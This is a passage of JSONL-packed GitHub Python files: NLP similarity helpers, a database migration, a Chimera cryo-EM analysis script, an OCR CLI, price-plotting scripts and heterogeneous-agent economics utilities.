cosine_similarity(vectors)\n\n\ndef get_vectors(*strs):\n text = [t for t in strs]\n log.debug(text)\n vectorizer = CountVectorizer(text)\n log.debug(vectorizer)\n vectorizer.fit(text)\n return vectorizer.transform(text).toarray()\n\n\ndef get_jaccard_sim(str1, str2): \n a = set(str1.lower().split()) \n # log.debug(\"intent: \", a)\n b = set(str2.lower().split())\n # log.debug(\"input :\", b)\n c = a.intersection(b)\n return float(len(c)) / (len(a) + len(b) - len(c))\n\ndef is_ci_token_stopword_match(a, b):\n \"\"\"Check if a and b are matches.\"\"\"\n tokens_a = [token.lower().strip(string.punctuation) for token in tokenizer.tokenize(a) \\\n if token.lower().strip(string.punctuation) not in stopwords]\n log.debug(\"sentence1: \", tokens_a)\n tokens_b = [token.lower().strip(string.punctuation) for token in tokenizer.tokenize(b) \\\n if token.lower().strip(string.punctuation) not in stopwords]\n log.debug(\"sentence2: \", tokens_b)\n return (tokens_a == tokens_b)\n\ndef bag_of_words(s,words):\n bag = [0 for _ in range(len(words))]\n s_words = nltk.word_tokenize(s)\n log.debug(\"before: \",s_words)\n s_words1 = [stemmer.stem(word.lower()) for word in s_words if word!=\"?\"]\n log.debug(\"final: \", s_words1)\n\n","repo_name":"akankshanb/Bot-Engine","sub_path":"plotbot/nlp/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"9890989195","text":"# coding: utf-8\n\"\"\"\nAdd NOT NULL constraint for data unless fed_id and component_id are not null.\n\"\"\"\n\nimport os\n\nimport flask_sqlalchemy\n\nfrom .actions_add_objects_readable_by_all_users_by_default import MIGRATION_INDEX as PREVIOUS_MIGRATION_INDEX\n\nMIGRATION_INDEX = PREVIOUS_MIGRATION_INDEX + 1\nMIGRATION_NAME, _ = os.path.splitext(os.path.basename(__file__))\n\n\ndef run(db: flask_sqlalchemy.SQLAlchemy) -> bool:\n constraints = db.session.execute(db.text(\"\"\"\n SELECT conname\n FROM pg_catalog.pg_constraint\n WHERE conname = 'files_not_null_check_data'\n \"\"\")).fetchall()\n\n if len(constraints) > 0:\n return False\n\n db.session.execute(db.text(\"\"\"\n UPDATE files SET data = '{\"storage\": \"local\", \"original_file_name\": \"\"}'::json WHERE data IS NULL AND (fed_id IS NULL OR component_id IS NULL)\n \"\"\"))\n\n # Perform migration\n db.session.execute(db.text(\"\"\"\n ALTER TABLE files\n ADD CONSTRAINT files_not_null_check_data\n CHECK (\n (\n fed_id IS NOT NULL AND\n component_id IS NOT NULL\n ) OR data IS NOT NULL\n )\n \"\"\"))\n return True\n","repo_name":"sciapp/sampledb","sub_path":"sampledb/models/migrations/files_add_data_not_null_constraint.py","file_name":"files_add_data_not_null_constraint.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"}
+{"seq_id":"70497383265","text":"#!/usr/bin/env python\n#\n\n# Python modules to load\nimport chimera\nimport os\t\t\t # For running OS commands\nimport subprocess \t\t# For invoking bash scripts inside this python script\nimport glob\nimport fnmatch # For gettin numbers of files\nimport shutil # For deleting existing analysis folders\nfrom shutil import copyfile\n\nfrom chimera import runCommand as rc # use 'rc' as shorthand for rc\nfrom chimera import replyobj # for emitting status messages\nfrom chimera.tkgui import saveReplyLog, clearReplyLog\n\n# Definition for ignoring hidden files, note use of sorted\ndef listdir_nohidden(path):\n return sorted(glob.glob(os.path.join(path, '*/')))\n\n#####################################################################################\n# REQUIRED VARIABLES - edit these to make point the script to PDB's\n#####################################################################################\n\n# Required variables\nthreshold = 3 # Volume threshold, in sigma\norigin = 'originIndex 0' # Insert an volume origin command here if desired\nmove = '0,0,0' # If the PDB's need moving\n#name = '28mini' # For file naming\n#res = '9.07' # Resolution for map model cross correlation\n\n#####################################################################################\n# Get to work\n#####################################################################################\n\n# Current working directory is set\ncwd = os.getcwd()\nprint('Current working diretory set:')\nprint(cwd)\n\n# Get directories inside PDB_built_final_geometry\ngeom = listdir_nohidden(cwd+\"/PDB_built_final_geometry\")\n\n# Get map info, name and resolution\nfor line in open(\"map/.map_info\"):\n if \"Map\" in line:\n print(line)\n fields = line.strip().split()\n # Array indices start at 0 unlike AWK\n print(fields[1])\n name = fields[1]\n\nfor line in open(\"map/.map_info\"):\n if \"Resolution\" in line:\n print(line)\n fields = line.strip().split()\n # Array indices start at 0 unlike AWK\n print(fields[1])\n res = fields[1]\n\n# Gather name of map found in the /map folder\nfor file in os.listdir(cwd+\"/map\"):\n if file.endswith(\".mrc\"):\n map=file\n\nshutil.rmtree(str(cwd)+'/PDB_built_final_geometry_all', ignore_errors=True)\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/images')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/movies_legs')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/movies_cage')\nos.mkdir(str(cwd)+'/PDB_built_final_geometry_all/PDB')\n\n# Since we now make movies etc, set window size\nrc('windowsize 1000 1000')\n\n#####################################################################################\n# Open reference model for alignment against\n#####################################################################################\n\n# Open ref PDB into #0\nrc('open #0 '+str(cwd)+'/scripts/ref_PDB.pdb')\n\n#####################################################################################\n# First loop through geometry classes, then then PDB's within that geometry\n#####################################################################################\n\n# Loop through directories inside /PDB_built_final_geometry\nfor dir in geom:\n # Get information about geometry\n signature = os.path.basename(os.path.dirname(dir))\n print(dir)\n print (signature)\n\n # Gather name of PDB found in the current geometry directory\n # Note sorted is very important to make list ordered\n pdblist = [fn for fn in sorted(os.listdir(dir)) if fn.endswith(\".pdb\")]\n print(pdblist)\n # No of PDB's\n pdbno = len(fnmatch.filter(os.listdir(dir), '*.pdb'))\n\n # Create directory for RMSD, alignbment matrices and CC saveReplyLog\n shutil.rmtree(str(dir)+'/RMSD', ignore_errors=True)\n os.mkdir(str(dir)+'/RMSD')\n shutil.rmtree(str(dir)+'/mapCC', ignore_errors=True)\n os.mkdir(str(dir)+'/mapCC')\n os.mkdir(str(dir)+'/mapCC/matrix')\n os.mkdir(str(dir)+'/mapCC/images')\n\n # Make more appropriate view for figures, use refPDB in #0 as starting orientation\n # Save to internal view accessible by 'reset p1'\n rc ('modeldisplay #0')\n rc('reset; focus; turn y -120; turn z -15; turn x 70; focus; savepos p1')\n\n #Open structures\n for i in range(0,pdbno):\n file=str(pdblist[i])\n rc('open '+str(dir)+'/'+str(file))\n\n # Color structures because you should\n rc('color #ADD8E6 #:1-225; color #fb9a99 #:331-838; color #6a3d9a #:839-1074; color #6a3d9a #:1075-1198; color #1F78B4 #:1199-1576; color #da0048 #:1577-1675')\n rc('color white #0')\n rc('~modeldisplay #0')\n\n #####################################################################################\n # Measure angles\n #####################################################################################\n\n #\n # Currently this is implemented in 2_TS_measure_angles.py\n #\n\n #####################################################################################\n # Calulate RMSD of aligned models\n #####################################################################################\n\n # Do structural alignment\n for i in range(1,pdbno+1):\n rc('match #'+str(i)+':1500-1600@ca #0:1500-1600@ca')\n\n # Save matrix file for restoring structural alignmemnt\n rc('matrixget '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Clear reply log ready for gathering RMSD\n clearReplyLog()\n\n # Do RMSD measurements in a matrix\n for i in range(1,pdbno+1):\n for j in range(1,pdbno+1):\n rc('rmsd #'+str(i)+' #'+str(j))\n\n # Save reply log ready for calculated RMSD values\n saveReplyLog(dir+'/RMSD/RMSD.log')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(pdbno))\n rc('save '+dir+'/RMSD/RMSD_'+str(signature)+'_session.py')\n\n #####################################################################################\n # Make images of fits and set up directory with PDB's and images with geometry signature prefix\n #####################################################################################\n\n # Open map for cross-correlation and making images, into #999\n rc('open #999 '+str(cwd)+'/map/'+str(map))\n rc('volume #999 sdLevel 4 color grey transparency 0.8')\n #Save default cage and model orientation\n rc('savepos p2')\n\n # Split matrices from RMSD alignment to get map trans/rots for making images\n os.chdir(str(dir)+\"RMSD\")\n #Call shell script for parsing matrix files\n subprocess.call(str(cwd)+'/scripts/matrix/extract_alignment_matrices.sh', shell=True)\n # Return to working directory\n os.chdir(\"..\")\n\n # Gather names of map alignment matrices\n # Note sorted is very important to make list ordered\n matlist = [fn for fn in sorted(os.listdir(dir+'/mapCC/matrix')) if fn.endswith(\".mat\")]\n print(matlist)\n # No of PDB's\n matno = len(fnmatch.filter(os.listdir(dir+'/mapCC/matrix'), '*.mat'))\n\n # Loop through matrices, apply to map keeping structure in place to inspect the alignment\n rc('2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"\"')\n rc('2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"\"')\n for j in range(0,matno):\n #Set view\n rc('reset p2')\n file=str(matlist[j])\n rc('matrixset '+str(dir)+'/mapCC/matrix/'+str(file))\n rc('modeldisplay #0')\n rc('turn y 60; turn x 30; focus #0; scale 0.9; clip hither 30; clip yon -80')\n rc('~modeldisplay #; modeldisplay #999; modeldisplay #'+str(j+1))\n #Make label\n rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"'+str(signature)+'\"')\n rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"'+str(j+1)+'\"')\n #Save image\n file=str(pdblist[j])\n rc('copy file '+str(dir)+'/mapCC/images/'+str(file)+'.png')\n rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/images/'+str(signature)+'_'+str(file)+'.png')\n #Save image sequence for movie encoding\n rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/movies_legs/'+str(signature)+'_image_'+str(j+1).zfill(3)+'.png')\n #Save PDB into directory with geometry signature prefix\n rc('write #'+str(j+1)+' '+str(dir)+'/../../PDB_built_final_geometry_all/PDB/'+str(signature)+'_'+str(file)+'.pdb')\n #Save this view so it can be recalled from mapCC session file, using: reset leg1, leg2, leg3 etc\n rc('savepos leg'+str(j+1))\n #Save an image of the cage with these geometries displayed\n rc('reset')\n rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.05 ypos 0.93 text \"'+str(signature)+'\"')\n rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.05 ypos 0.88 text \"'+str(name)+'\"')\n rc('~modeldisplay #; modeldisplay #1-'+str(pdbno)+'; modeldisplay #999')\n rc('copy file '+str(dir)+'/../../PDB_built_final_geometry_all/movies_cage/'+str(signature)+'_image_'+str(j+1).zfill(3)+'.png')\n\n rc('2dlabels delete label1; 2dlabels delete label2')\n\n #Call shell script encoding movie\n #subprocess.call(str(cwd)+'/scripts/matrix/extract_alignment_matrices.sh', shell=True)\n\n #####################################################################################\n # Calulate model-map cross correlation\n #####################################################################################\n\n # Reset positions to bring triskelia back onto original cage positions, save an image\n rc('reset')\n rc('~modeldisplay #; modeldisplay #1-'+str(pdbno)+'; modeldisplay #999')\n rc('copy file '+str(dir)+'/mapCC/map_CC_'+str(signature)+'.png')\n\n # Clear reply log ready for gathering model cross correlation\n clearReplyLog()\n\n # Do model-map cross correlation\n for i in range(1,pdbno+1):\n rc('molmap #'+str(i)+' '+str(res)+' modelId #1000')\n rc('measure correlation #999 #1000')\n rc('close #1000')\n\n # Save reply log ready for measured model cross correlation\n saveReplyLog(dir+'/mapCC/map_CC.log')\n\n # Save session\n rc('save '+dir+'/mapCC/map_CC_'+str(signature)+'_session.py')\n\n #####################################################################################\n # Close models ready for next geometry class\n #####################################################################################\n\n # Close structures\n rc('close #1-#'+str(pdbno))\n\n #####################################################################################\n # Create leg path session for figures\n #####################################################################################\n\n # Gather name of leg bilds found in the current geometry directory\n # Note sorted is very important to make list ordered\n leglist = [fn for fn in sorted(os.listdir(dir+'/PDB_angles_bild')) if fn.endswith(\"leg.bild\")]\n print(leglist)\n # No of PDB's\n legno = len(fnmatch.filter(os.listdir(dir+'/PDB_angles_bild'), '*leg.bild'))\n\n #Open leg paths\n for i in range(0,legno):\n file=str(leglist[i])\n rc('open '+str(dir)+'PDB_angles_bild/'+str(file))\n\n #Apply alignment matrix\n rc('matrixset '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(legno))\n rc('save '+dir+'/RMSD/legs_'+str(signature)+'_session.py')\n\n # Close legs\n rc('close #1-#'+str(pdbno))\n\n #####################################################################################\n # Create principal component session for figures\n #####################################################################################\n\n # Gather name of leg bilds found in the current geometry directory\n # Note sorted is very important to make list ordered\n paxlist = [fn for fn in sorted(os.listdir(dir+'/PDB_angles_bild')) if fn.endswith(\"pax.bild\")]\n print(paxlist)\n # No of PDB's\n paxno = len(fnmatch.filter(os.listdir(dir+'/PDB_angles_bild'), '*pax.bild'))\n\n #Open leg paths\n for i in range(0,paxno):\n file=str(paxlist[i])\n rc('open '+str(dir)+'PDB_angles_bild/'+str(file))\n\n #Apply alignment matrix\n rc('matrixset '+dir+'/RMSD/RMSD_alignment_matrix')\n\n # Save session\n rc('~modeldisplay #; modeldisplay #0; focus; ~modeldisplay #; modeldisplay #1-#'+str(paxno))\n rc('save '+dir+'/RMSD/pax_'+str(signature)+'_session.py')\n\n # Close pax\n rc('close #1-#'+str(paxno))\n\n#####################################################################################\n# Tidy up\n#####################################################################################\n\n#Call shell script encoding movie\nos.chdir(cwd)\nsubprocess.call(str(cwd)+'/scripts/movie/movie_encode.sh', shell=True)\n\n# Close chimera when finished\nrc('stop')\n\n\n\n\n#### Depreciated movie code\n\n # Loop through matrices as above but make a movie of this\n #rc('movie record')\n #rc('2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"\"')\n #rc('2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"\"')\n #for k in range(0,matno):\n #rc('reset p2')\n #file=str(matlist[i])\n #rc('matrixset '+str(dir)+'/mapCC/matrix/'+str(file))\n #rc('modeldisplay #0')\n #rc('turn y 60; turn x 30; focus #0; scale 0.9; clip hither 30; clip yon -80')\n #rc('~modeldisplay #; modeldisplay #999; modeldisplay #'+str(k+1))\n #rc('2dlabels delete label1; 2dlabels create label1 color black size 40 xpos 0.75 ypos 0.93 text \"'+str(signature)+'\"')\n #rc('2dlabels delete label2; 2dlabels create label2 color black size 40 xpos 0.93 ypos 0.88 text \"'+str(k)+'\"')\n #rc('wait 10')\n #rc('movie encode output '+str(dir)+'/../../PDB_built_final_geometry_all/movies/'+str(signature)+'_movie.mp4 quality highest')\n #rc('2dlabels delete label1; 2dlabels delete label2')\n","repo_name":"kylelmorris/Morris_2019_NSMB","sub_path":"cage_modelling/36barrel/scripts/6_build_final_geometry_RMSD_mapCC.py","file_name":"6_build_final_geometry_RMSD_mapCC.py","file_ext":"py","file_size_in_byte":14031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"74366793182","text":"import argparse, time\nfrom reconhece_frente import reconhece_frente\nfrom reconhece_verso import reconhece_verso\nfrom reconhece_texto import reconhece_texto\nfrom apply_filter import apply_filter\n\n\ndef main():\n name = str(time.time()).split('.')[0]\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument('-s', '--support')\n parser.add_argument('-f', '--frente')\n parser.add_argument('-v', '--verso')\n\n args = parser.parse_args()\n\n for currentArgument in args.__dict__:\n if args.__dict__[currentArgument] != None:\n if currentArgument == 'frente':\n doc_frente = args.__dict__[currentArgument]\n\n elif currentArgument == 'verso':\n doc_verso = args.__dict__[currentArgument]\n\n elif currentArgument == 'support':\n print('Help')\n\n else:\n print(f'{currentArgument} não é um argumento válido')\n\n if doc_frente and doc_verso:\n reconhece_frente(doc_frente, name)\n reconhece_verso(doc_verso, name)\n apply_filter(name)\n reconhece_texto(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anthonyreis/reconhecimento_doc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"75158807263","text":"import pandas as pd\n\ndf = pd.read_csv(\"executions_fx_btc.tsv\", sep=\"\\t\")\n\ndf[\"base_price\"] = df.iloc[0][\"price\"]\ndf[\"price\"] = df[\"price\"] - df[\"base_price\"]\n# print(df)\ndf[\"date\"] = pd.to_datetime(df[\"date\"], format=\"%Y-%m-%dT%H:%M:%S.%fZ\")\ndf = df.set_index(\"date\")\n\n\ndf = df[\"price\"].resample(\"S\").mean()\ndf = df.resample(\"S\").interpolate()\n\ndfs = []\nfor i in range(1, 101):\n _df = df.rolling(i).mean()\n _df.name = str(i)\n dfs.append(_df)\n\ndf = pd.concat(dfs, axis=1)\ndf = df.reset_index()\ndf = df.drop(\"date\", axis=1)\n# print(df)\n\nfor index, row in df.iterrows():\n for i, value in enumerate(row.values):\n if not pd.isna(value):\n x = index / 10\n y = value / 1_000\n z = i / 10\n print(x, y, z, sep=\"\\t\")\n\n if index == 300:\n break","repo_name":"ShunsukeMzk/PlotterServer","sub_path":"tools/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13213682731","text":"\nimport pandas as pd # Pandas 资料处理套件\nimport mplfinance as mpf # 绘制 K 线套件\n \n# 读取每日股价资料\n\n\nnames = ['Date', 'Adj_Close', 'Close', 'High', 'Low', 'Open', 'Volume']\ndf = pd.read_csv(r'stock2317.csv', # 每日股价资料 CSV 档\n header=None, \n names=names,\n skiprows=3, # 跳过开头三行档头标记\n index_col=None, \n delimiter=',')\ndf['Date'] = pd.to_datetime(df['Date']) # 字串转为 datetime 资料型态\ndf.set_index('Date', inplace=True) # 指定索引排序字段为 Date\ndf_adj = df.iloc[:,1:5] # 'Close', 'High', 'Low', 'Open'\n\nfrom pylab import mpl\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n# 设定绘图颜色\nmc = mpf.make_marketcolors(\n\tup='red', # 上涨 K 棒颜色\n\tdown='green', # 下跌 K 棒颜色 \n\tedge='i', # K线线柱边缘颜色(i代表继承自up和down的颜色)\n\twick='i', # 上下影线颜色\n\tvolume='in', # 成交量长条图的颜色\n\tinherit=True) # 是否继承颜色设定\n\ns = mpf.make_mpf_style(\n\tgridaxis='both', # 格线位置\n\tgridstyle='-.', # 格线线型\n\ty_on_right=False, # y轴位置是否在右\n rc={'font.size':12, \n 'font.sans-serif':'SimHei', # 指定中文字型\n 'axes.titlesize':18,\n 'axes.labelsize':16,\n 'xtick.labelsize':12,\n 'ytick.labelsize':12},\n\tmarketcolors=mc)\n\nmpf.plot(df_adj,\n type='candle', # 指定 K 棒绘图符号格式\n title=' 鸿海2020年股价',\n ylabel='股价',\n figratio=(15, 10), # 图形大小\n figscale=1,\n xrotation=20, # 日期显示旋转角度\n style=s, # 设定绘图风格\n show_nontrading=False) # 是否显示无交易日\n","repo_name":"pony0613/Binance-Trading-Bot","sub_path":"kline.py","file_name":"kline.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7226872378","text":"import numpy as np\nfrom numba import njit, guvectorize\n\n\ndef set_parameters(r=0.05, beta=0.94, sigma=2.0, sigma_eps=0.5, N_eps=7, N_a=200, amax=1000):\n \"\"\"\n Defines the main parameters of the model.\n \"\"\"\n params = dict()\n\n # INTEREST RATE\n params['r'] = r\n\n # PREFERENCES\n params['sigma'] = sigma # Inverse elasticity of substitution\n params['beta'] = beta # Subjective discount factor\n\n # IDIOSYNCRATIC PRODUCTIVITY\n params['rho_eps'] = 0.5\n params['sigma_eps'] = sigma_eps\n params['N_eps'] = N_eps # Number of idiosyncatic states (epsilon)\n params['y_eps'], params['pi_eps'], params['Pi_eps'] = markov_incomes(\n rho=params['rho_eps'], sigma_y=params['sigma_eps'], N=params['N_eps'])\n\n # ASSET GRID\n params['N_a'] = N_a # Number of grid points\n params['amax'] = amax # Maximum value of the grid\n params['a'] = agrid(amin=0.0, amax=params['amax'], N=params['N_a']) # Borrowing limit and asset grid\n\n return params\n\n\n@guvectorize(['void(float64[:], float64[:], float64[:], float64[:])'], '(n),(nq),(n)->(nq)')\ndef interpolate_y(x, xq, y, yq):\n \"\"\"\n Efficient linear interpolation exploiting monotonicity.\n\n Complexity O(n+nq), so most efficient when x and xq have comparable number of points.\n Extrapolates linearly when xq out of domain of x.\n\n Parameters\n ----------\n x: array\n ascending data points\n xq: array\n ascending query points\n y: array\n data points\n yq: array\n empty to be filled with interpolated points\n \"\"\"\n nxq, nx = xq.shape[0], x.shape[0]\n\n xi = 0\n x_low = x[0]\n x_high = x[1]\n for xqi_cur in range(nxq):\n xq_cur = xq[xqi_cur]\n while xi < nx - 2:\n if x_high >= xq_cur:\n break\n xi += 1\n x_low = x_high\n x_high = x[xi + 1]\n\n xqpi_cur = (x_high - xq_cur) / (x_high - x_low)\n yq[xqi_cur] = xqpi_cur * y[xi] + (1 - xqpi_cur) * y[xi + 1]\n\n\n@guvectorize(['void(float64[:], float64[:], uint32[:], float64[:])'], '(n),(nq)->(nq),(nq)')\ndef interpolate_coord(x, xq, xqi, xqpi):\n \"\"\"\n Efficient linear interpolation exploiting monotonicity. xq = xqpi * x[xqi] + (1-xqpi) * x[xqi+1]\n\n Parameters\n ----------\n x: array\n ascending data points\n xq: array\n ascending query points\n xq: array\n empty to be filled with indices of lower bracketing gridpoints\n xqpi: array\n empty to be filled with weights on lower bracketing gridpoints\n\n \"\"\"\n nxq, nx = xq.shape[0], x.shape[0]\n\n xi = 0\n x_low = x[0]\n x_high = x[1]\n for xqi_cur in range(nxq):\n xq_cur = xq[xqi_cur]\n while xi < nx - 2:\n if x_high >= xq_cur:\n break\n xi += 1\n x_low = x_high\n x_high = x[xi + 1]\n\n xqpi[xqi_cur] = (x_high - xq_cur) / (x_high - x_low)\n xqi[xqi_cur] = xi\n\n\n@njit(fastmath=True)\ndef forward_step(D, Pi_T, a_pol_i, a_pol_pi):\n \"\"\"\n Single forward step to update distribution using an arbitrary asset policy.\n\n Efficient implementation of D_t = Lam_{t-1}' @ D_{t-1} using sparsity of Lam_{t-1}.\n\n Parameters\n ----------\n D: np.ndarray\n Beginning-of-period distribution over s_t, a_(t-1)\n Pi_T: np.ndarray\n Transpose Markov matrix that maps s_t to s_(t+1)\n a_pol_i: np.ndarray\n Left gridpoint of asset policy\n a_pol_pi: np.ndarray\n Weight on left gridpoint of asset policy\n\n Returns\n ----------\n Dnew : np.ndarray\n Beginning-of-next-period dist s_(t+1), a_t\n\n \"\"\"\n # first create Dnew from updating asset state\n Dnew = np.zeros((D.shape[0], D.shape[1]))\n for s in range(D.shape[0]):\n for i in range(D.shape[1]):\n apol = a_pol_i[s, i]\n api = a_pol_pi[s, i]\n d = D[s, i]\n Dnew[s, apol] += d * api\n Dnew[s, apol + 1] += d * (1 - api)\n\n # then use transpose Markov matrix to update income state\n Dnew = Pi_T @ Dnew\n\n return Dnew\n\n\ndef markov_rouwenhorst(rho, sigma, N=7):\n \"\"\"\n Rouwenhorst method to discretize an AR(1) process\n \"\"\"\n # parametrize Rouwenhorst for n=2\n p = (1 + rho) / 2\n Pi = np.array([[p, 1 - p], [1 - p, p]])\n\n # implement recursion to build from n=3 to n=N\n for n in range(3, N + 1):\n P1, P2, P3, P4 = (np.zeros((n, n)) for _ in range(4))\n P1[:-1, :-1] = p * Pi\n P2[:-1, 1:] = (1 - p) * Pi\n P3[1:, :-1] = (1 - p) * Pi\n P4[1:, 1:] = p * Pi\n Pi = P1 + P2 + P3 + P4\n Pi[1:-1] /= 2\n\n # invariant distribution and scaling\n pi = stationary(Pi)\n s = np.linspace(-1, 1, N)\n s *= (sigma / np.sqrt(var(s, pi)))\n\n return s, pi, Pi\n\n\ndef markov_incomes(rho, sigma_y, N=11):\n \"\"\"\n Simple helper method that assumes AR(1) process in logs for incomes and scales aggregate income\n to 1, also that takes in sdy as the *cross-sectional* sd of log incomes\n \"\"\"\n sigma = sigma_y * np.sqrt(1 - rho ** 2)\n s, pi, Pi = markov_rouwenhorst(rho, sigma, N)\n y = np.exp(s) / np.sum(pi * np.exp(s))\n return y, pi, Pi\n\n\ndef mean(x, pr):\n pr = pr / np.sum(pr)\n return np.sum(pr * x)\n\n\ndef cov(x, y, pr):\n pr = pr / np.sum(pr)\n return np.sum(pr * (x - mean(x, pr)) * (y - mean(y, pr)))\n\n\ndef var(x, pr):\n pr = pr / np.sum(pr)\n return cov(x, x, pr)\n\n\ndef ineq(ss, pop):\n \"\"\"\n Inequality statistics.\n \"\"\"\n T, Neps, Na = ss['a'].shape\n a_flat = ss['a'].reshape(T, 1, Neps * Na).squeeze() # reshape multi-dimensional policies\n Dst_flat = ss['D'].reshape(T, 1, Neps * Na).squeeze() # flatten out the joint distribution\n\n # Lorenz curves\n a = np.einsum('js,js->s', pop.pi[:, np.newaxis], a_flat)\n p = np.einsum('js,js->s', pop.pi[:, np.newaxis], Dst_flat)\n p = p / np.sum(p) # Make sure sums to one\n a_sorted = np.sort(a) # Sort vectors from lowest to highest\n a_sorted_i = np.argsort(a)\n p_a_sorted = p[a_sorted_i] # Recover associated probabilities\n lorenz_a_pctl, lorenz_a = lorenz(a_sorted, p_a_sorted) # Get Lorenz curves\n\n return lorenz_a_pctl, lorenz_a\n\n\ndef lorenz(x, pr):\n \"\"\"\n Returns Lorenz curve.\n \"\"\"\n # first do percentiles of the total population\n pctl = np.concatenate(([0], pr.cumsum() - pr / 2, [1]))\n # now do percentiles of total wealth (returns only zeros if sum(pr*x) = 0)\n wealthshare = (x * pr / np.sum(x * pr) if np.sum(x * pr) != 0 else np.zeros_like(x))\n wealthpctl = np.concatenate(([0], wealthshare.cumsum() - wealthshare / 2, [1]))\n return pctl, wealthpctl\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n return (np.abs(array - value)).argmin()\n\n\ndef agrid(amax, N, amin=0):\n \"\"\"\n Grid a+pivot evenly log-spaced between amin+pivot and amax+pivot\n \"\"\"\n pivot = np.abs(amin) + 0.25\n a = np.geomspace(amin + pivot, amax + pivot, N) - pivot\n a[0] = amin # make sure *exactly* equal to amin\n\n return a\n\n\n@njit\ndef within_tolerance(x1, x2, tol):\n \"\"\"\n Efficiently test max(abs(x1-x2)) <= tol for arrays of same dimensions x1, x2.\n \"\"\"\n y1 = x1.ravel()\n y2 = x2.ravel()\n for i in range(y1.shape[0]):\n if np.abs(y1[i] - y2[i]) > tol:\n return False\n return True\n\n\ndef stationary(Pi, pi_seed=None, tol=1E-11, maxit=10_000):\n \"\"\"\n Find invariant distribution of a Markov chain by iteration.\n \"\"\"\n if pi_seed is None:\n pi = np.ones(Pi.shape[0]) / Pi.shape[0]\n else:\n pi = pi_seed\n\n for it in range(maxit):\n pi_new = pi @ Pi\n if within_tolerance(pi_new, pi, tol):\n break\n pi = pi_new\n else:\n raise ValueError(f'No convergence after {maxit} forward iterations!')\n pi = pi_new\n\n return pi\n\n\ndef make_path(x, T):\n \"\"\"\n Takes in x as either a number, a vector or a matrix, turning it into a path.\n \"\"\"\n x = np.asarray(x)\n if x.ndim <= 1:\n return np.tile(x, (T, 1))\n\n elif x.ndim == 2:\n return np.tile(x, (T, 1, 1))\n\n\ndef make_full_path(x, T):\n \"\"\"\n Takes a path x (vector/matrix), and repeats the last line until x has T lines.\n \"\"\"\n if x.ndim == 1:\n raise ValueError('x must be a column vector')\n\n if T < x.shape[0]:\n raise ValueError('T must be greater than the number of lines in x')\n\n return np.vstack((x, make_path(x[-1], T - x.shape[0])))\n\n\ndef pack_jacobians(jacdict, inputs, outputs, T):\n \"\"\"\n If we have T*T jacobians from nI inputs to nO outputs in jacdict, combine into (nO*T)*(nI*T) jacobian matrix.\n \"\"\"\n nI, nO = len(inputs), len(outputs)\n\n outjac = np.empty((nO * T, nI * T))\n for iO in range(nO):\n subdict = jacdict.get(outputs[iO], {})\n for iI in range(nI):\n outjac[(T * iO):(T * (iO + 1)), (T * iI):(T * (iI + 1))] = make_matrix(\n subdict.get(inputs[iI], np.zeros((T, T))), T)\n return outjac\n\n\ndef unpack_jacobians(bigjac, inputs, outputs, T):\n \"\"\"\n If we have an (nO*T)*(nI*T) jacobian and provide names of nO outputs and nI inputs, output nested dictionary\n \"\"\"\n nI, nO = len(inputs), len(outputs)\n\n jacdict = {}\n for iO in range(nO):\n jacdict[outputs[iO]] = {}\n for iI in range(nI):\n jacdict[outputs[iO]][inputs[iI]] = bigjac[(T * iO):(T * (iO + 1)), (T * iI):(T * (iI + 1))]\n return jacdict\n\n\ndef make_matrix(A, T):\n \"\"\"\n If A is not an outright ndarray, e.g. it is SimpleSparse, call its .matrix(T) method\n to convert it to T*T array.\n \"\"\"\n if not isinstance(A, np.ndarray):\n return A.matrix(T)\n else:\n return A\n\n\ndef pack_vectors(vs, names, T):\n v = np.zeros(len(names)*T)\n for i, name in enumerate(names):\n if name in vs:\n v[i*T:(i+1)*T] = vs[name]\n return v\n\n\ndef unpack_vectors(v, names, T):\n vs = {}\n for i, name in enumerate(names):\n vs[name] = v[i*T:(i+1)*T]\n return vs\n","repo_name":"FredericMartenet/OLGHA","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9920,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"}
